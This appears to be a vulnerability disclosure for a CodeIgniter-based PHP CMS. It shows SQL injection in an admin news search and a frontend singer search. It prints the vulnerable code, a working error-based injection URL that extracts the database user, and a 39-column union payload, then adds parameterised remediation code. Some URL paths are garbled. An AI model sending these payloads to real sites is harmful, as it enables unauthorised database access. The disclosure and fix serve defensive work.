### Brief description:
Damn it.
### Details:
Downloaded it yesterday; it's the version updated on 2.16.
The first spot is in the admin backend: https://images.seebug.org/upload/app/controllers/admin/news.php, line 66
```php
public function so()
{
    $key = $this->input->get('key');   // parameters are read via GET with no processing
    $user = $this->input->get('user');
    $cid = $this->input->get('cid');
    $page = $this->input->get('page');
    if(empty($page)) $page=1;
    $sql_string = "SELECT * FROM ".CS_SqlPrefix."news where 1=1";
    if($key){
        $sql_string.= " and CS_Name like '%".$key."%'";
    }
    if($user){
        $sql_string.= " and CS_User like '%".$user."%'";
    }
    if($cid){
        if($cid=="-1"){
            $sql_string.= " and cs_hid=1";
        }elseif($cid=="-2"){
            $sql_string.= " and cs_yid=1";
        }else{
            $sql_string.= " and CS_CID=".$cid."";
        }
    }
    $sql_string.= " order by CS_AddTime desc"; // string concatenation
    $query = $this->db->query($sql_string);    // passed straight into the query, unprocessed
    $total = $query->num_rows();
```
Request URL: `http://127.0.0.1/cmshttps://images.seebug.org/upload/index.php/admin/dance/so/?key=1' AND (SELECT 5960 FROM(SELECT COUNT(*),CONCAT((select user()),(SELECT (CASE WHEN (5960=5960) THEN 1 ELSE 0 END)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)%23`
Information is read out through the displayed error.
![.png](https://images.seebug.org/upload/201402/180920338e24e8172c1119ba2cfdb52b05a42d33.png)
The other spot is in the frontend: https://images.seebug.org/upload/app/controllers/singer.php, line 127
```php
public function so()
{
    $data='';$data_content='';
    $fid = $this->security->xss_clean($this->uri->segment(3));          // mode
    $key = $this->security->xss_clean($this->uri->segment(4));          // keyword
    $page = intval($this->security->xss_clean($this->uri->segment(5))); // page number
    if($page==0) $page=1;
    if(empty($key)) $key = $this->input->post('key', TRUE); // key is also accepted via POST
```
Following the variable to line 165 of the same file:
```php
if($fid=='zm' && in_array(strtoupper($key),$zimu_arr)){ // search by initial letter
    $posarr=array_keys($zimu_arr,strtoupper($key));
    $pos=$posarr[0];
    $sqlstr="SELECT * FROM ".CS_SqlPrefix."singer where CS_YID=0 and ((ord( substring( CS_Name, 1, 1 ) ) -65536>=".($zimu_arr1[$pos])." and ord( substring( CS_Name, 1, 1 ) ) -65536<=".($zimu_arr2[$pos]).")) or UPPER(substring( CS_Name, 1, 1 ))='".$zimu_arr[$pos]."'";
}else{
    $sqlstr="select * from ".CS_SqlPrefix."singer where CS_YID=0 and CS_Name like '%".$key."%' order by CS_AddTime desc"; // $key goes into the query with no processing in between
}
```
![1.png](https://images.seebug.org/upload/201402/18092519b9d8b9104c8c44b319c0436a1d3a289e.png)
### Proof of vulnerability:
The second spot can't read information through the displayed error; the SQL statement doesn't get through that way...
But union can be used to read the columns and other information (payload attached: `http://127.0.0.1/cmshttps://images.seebug.org/upload/index.php/vod/so/key/%25%27%20union%20select%201%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%23`)
It returns correctly, indicating there are 39 fields.
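As an added remediation example (not the CMS's own code), here is how both search methods above could be rewritten in CodeIgniter 2 so user input never reaches the SQL string unescaped: the admin news search uses Active Record, which quotes values and escapes LIKE wildcards itself, and the singer name search uses query bindings. Table, column and constant names come from the excerpts above; the controller class names and the helper name `search_by_name` are assumed.

```php
<?php
// Added example, not the CMS's own code. Assumes CodeIgniter 2 with Active
// Record enabled; table/column names come from the excerpts, class names are assumed.
// admin/news.php: Active Record escapes every value and LIKE wildcard.
class News extends CI_Controller
{
    public function so()
    {
        $key  = $this->input->get('key');
        $user = $this->input->get('user');
        $cid  = $this->input->get('cid');
        $page = (int) $this->input->get('page');
        if ($page < 1) $page = 1;
        $this->db->from(CS_SqlPrefix . 'news');
        // like() quotes the value, so a quote in $key cannot close the literal
        if ($key !== FALSE && $key !== '') {
            $this->db->like('CS_Name', $key);
        }
        if ($user !== FALSE && $user !== '') {
            $this->db->like('CS_User', $user);
        }
        if ($cid !== FALSE && $cid !== '') {
            if ($cid === '-1') {
                $this->db->where('cs_hid', 1);
            } elseif ($cid === '-2') {
                $this->db->where('cs_yid', 1);
            } else {
                $this->db->where('CS_CID', (int) $cid); // only an integer reaches the query
            }
        }
        $this->db->order_by('CS_AddTime', 'desc');
        $query = $this->db->get();
        $total = $query->num_rows();
        // pagination and view loading continue as in the original method
    }
}

// singer.php, the name-search branch: a bound parameter replaces the
// concatenated $key; escape_like_str() escapes % and _ with '!'.
class Singer extends CI_Controller
{
    private function search_by_name($key)
    {
        $sqlstr = "SELECT * FROM " . CS_SqlPrefix . "singer"
                . " WHERE CS_YID=0 AND CS_Name LIKE ? ESCAPE '!'"
                . " ORDER BY CS_AddTime DESC";
        return $this->db->query($sqlstr, array('%' . $this->db->escape_like_str($key) . '%'));
    }
}
```

With either form the payloads shown above are sent to MySQL as literal search text, so the error-based and union-based queries no longer execute.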